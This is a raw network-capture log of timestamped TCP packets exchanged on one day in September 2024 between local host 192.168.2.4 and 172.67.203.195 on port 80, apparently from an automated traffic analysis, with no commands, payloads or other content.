                                        Sep 14, 2024 18:31:11.432157993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432168961 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432178974 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432188988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432199955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432209015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432212114 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432221889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432230949 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432234049 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432255983 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432285070 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432313919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432322979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432344913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432356119 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432364941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432378054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432384968 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432389021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432400942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432409048 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432457924 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432457924 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432518959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432529926 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432539940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432552099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432564020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432574987 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432585001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.432595015 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432637930 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.432637930 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433228016 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433238983 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433255911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433265924 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433276892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433283091 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433289051 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433316946 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433335066 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433428049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433439970 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433449984 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433459997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433470011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433480978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433486938 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433494091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433526039 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433526039 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433554888 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433590889 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433603048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433612108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433620930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433633089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433643103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433653116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433661938 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433661938 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433682919 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433692932 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433701992 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433703899 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433715105 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433726072 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433733940 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433743954 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433746099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433758020 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433768034 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433768988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.433804989 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.433834076 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.442553043 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442569017 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442581892 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442632914 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.442676067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442687035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442697048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442707062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.442732096 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.442763090 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.471534014 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471618891 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.471720934 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471730947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471741915 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471752882 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471765041 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471776009 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471787930 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.471905947 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.471906900 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.471906900 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.514302969 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514365911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514369965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514375925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514379978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514384985 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514415979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514420986 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514651060 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.514777899 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514786959 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514825106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514841080 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.514856100 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514868021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514873981 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.514878988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514913082 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.514942884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514954090 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.514996052 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.515172005 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515182972 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515192032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515227079 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.515244007 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515249968 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.515255928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515268087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515278101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515292883 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.515295982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.515337944 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.517178059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517189980 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517199993 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517210960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517242908 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.517257929 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517268896 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517280102 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517288923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517297029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.517297029 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.517332077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.517911911 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517923117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517934084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517951965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517962933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.517968893 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518003941 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518008947 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518022060 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518023968 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518083096 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518485069 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518495083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518539906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518549919 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518562078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518579960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518626928 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518677950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518690109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518699884 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518712997 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518731117 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518733978 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518764973 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518783092 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518789053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518802881 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518863916 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518934011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518944979 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518955946 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518965960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518976927 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.518986940 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.518989086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519000053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519025087 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519032001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519043922 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519052982 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519057035 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519068956 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519081116 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519083977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519092083 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519104958 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519108057 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519115925 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519153118 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519153118 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519169092 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519182920 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519195080 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519207001 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519208908 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519229889 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519263983 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519294977 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519313097 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519324064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519335032 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519347906 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519377947 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519407034 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.519414902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519428015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.519467115 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520011902 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520030975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520042896 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520052910 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520066023 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520070076 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520083904 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520096064 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520106077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520111084 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520139933 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520191908 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520204067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520215988 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520226955 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520239115 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520247936 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520277977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520303011 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520313978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520324945 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520335913 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520347118 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520354033 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520359039 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520373106 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520375013 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520397902 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520436049 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520448923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520466089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520476103 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520487070 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520492077 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520498991 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520528078 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520558119 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520567894 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520580053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520591021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520603895 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520613909 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.520622969 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520642042 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.520659924 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.521087885 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.529540062 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529551029 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529560089 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529618025 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.529633045 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529643059 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529653072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529663086 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529671907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.529721022 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.558525085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558533907 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558566093 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558615923 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558625937 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558635950 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558756113 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.558757067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.558757067 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.558763981 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558774948 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.558850050 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.601391077 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601401091 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601417065 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601427078 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601442099 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601490021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601500034 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601509094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601622105 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.601622105 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.601622105 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.601721048 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601802111 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601811886 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601845980 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601855040 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601865053 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601875067 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.601943016 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.602150917 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602160931 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602170944 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602247000 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.602266073 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602276087 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602287054 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602296114 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602303982 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.602344036 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604072094 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604084015 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604093075 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604140043 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604176044 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604185104 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604196072 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604206085 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604217052 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604243994 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604264975 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604275942 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604773998 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604784966 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604795933 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604861021 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604866028 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604872942 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604885101 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604897976 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.604924917 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.604959965 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.605523109 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605556965 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605566978 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605607033 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.605623960 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605634928 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605644941 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:11.605679035 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:11.605685949 CEST8049738172.67.203.195192.168.2.4
